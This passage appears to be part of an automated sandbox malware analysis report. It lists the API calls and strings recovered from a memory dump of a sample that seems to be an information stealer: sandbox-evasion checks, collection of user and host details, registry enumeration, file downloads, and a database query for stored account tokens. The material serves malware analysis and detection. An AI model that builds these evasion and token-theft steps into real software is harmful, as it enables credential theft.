                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                      • String ID: :$C$\
                                                                                                                                                                                                                                      • API String ID: 3790021787-3809124531
                                                                                                                                                                                                                                      • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                      • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                      • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                                                                                                                      • String ID: '@$'@
                                                                                                                                                                                                                                      • API String ID: 1815715184-345573653
                                                                                                                                                                                                                                      • Opcode ID: ade6bf95ff6b3192d7b4b22adc4c9fce4594f25298dc92e23d3df2276528e089
                                                                                                                                                                                                                                      • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ade6bf95ff6b3192d7b4b22adc4c9fce4594f25298dc92e23d3df2276528e089
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04076828,00000000,?,0041D774,00000000,?,00000000,00000000,?,040768B8), ref: 0041496D
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                      • String ID: %d MB$@
                                                                                                                                                                                                                                      • API String ID: 2886426298-3474575989
                                                                                                                                                                                                                                      • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                      • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                      • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,04070728), ref: 00405DE7
                                                                                                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                                                                                                      • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 729276229-0
                                                                                                                                                                                                                                      • Opcode ID: 2c33a23298cca61dfdaeee40ce65a6995c68276a218cce1f1fd24f42d4950647
                                                                                                                                                                                                                                      • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c33a23298cca61dfdaeee40ce65a6995c68276a218cce1f1fd24f42d4950647
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT ref: 00413D9E
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413E2A
                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT ref: 00413F7E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                                      • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                                                                                      • API String ID: 224852652-4138519520
                                                                                                                                                                                                                                      • Opcode ID: bdd97628f29c753fecfde2c83a5401364cfafbcd459e9bc7d3d7e6f311fbbc6e
                                                                                                                                                                                                                                      • Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdd97628f29c753fecfde2c83a5401364cfafbcd459e9bc7d3d7e6f311fbbc6e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                                                                                                        • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                      • API String ID: 2910778473-1079375795
                                                                                                                                                                                                                                      • Opcode ID: d6f8aa2c73c68f92a0e58bbbfc20920170efd5a28ce5b04736f5b5a1e9792500
                                                                                                                                                                                                                                      • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6f8aa2c73c68f92a0e58bbbfc20920170efd5a28ce5b04736f5b5a1e9792500
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04052928), ref: 00415F11
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04052958), ref: 00415F2A
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,040528F8), ref: 00415F42
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04052970), ref: 00415F5A
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04052988), ref: 00415F73
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,0406DC80), ref: 00415F8B
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04054058), ref: 00415FA3
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04053E98), ref: 00415FBC
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04070438), ref: 00415FD4
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04070348), ref: 00415FEC
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,040704C8), ref: 00416005
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04070228), ref: 0041601D
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04053EB8), ref: 00416035
                                                                                                                                                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,040703D8), ref: 0041604E
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                                                                                                                                                        • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                        • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                        • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                        • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                        • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                        • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                        • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                        • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                        • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                        • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                                                                                                                                                      • GetUserDefaultLangID.KERNEL32 ref: 004136E6
                                                                                                                                                                                                                                        • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                        • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04070898,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                        • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                        • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                        • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                        • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                        • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0406DD00,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,?,0406DD00,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1125299040-0
                                                                                                                                                                                                                                      • Opcode ID: 347c744c57bb489da1d20327baf5dbd504a16fe07c4081f8531455d2c5727875
                                                                                                                                                                                                                                      • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 347c744c57bb489da1d20327baf5dbd504a16fe07c4081f8531455d2c5727875
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000000,040767F8,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000000,040769D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000), ref: 00414DA5
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                                                                                                      • API String ID: 3896182533-4073750446
                                                                                                                                                                                                                                      • Opcode ID: 8ab0f01d07d0afedc2f6091183216f607dc1c33232ff2026bfdf8348589bd1d2
                                                                                                                                                                                                                                      • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ab0f01d07d0afedc2f6091183216f607dc1c33232ff2026bfdf8348589bd1d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411DA5
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,04077810,00000000,00020119,?), ref: 00411DC4
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,04078430,00000000,00000000,00000000,000000FF), ref: 00411DE8
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00411DF2
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 00411E17
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078268), ref: 00411E2B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2623679115-0
                                                                                                                                                                                                                                      • Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                      • Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

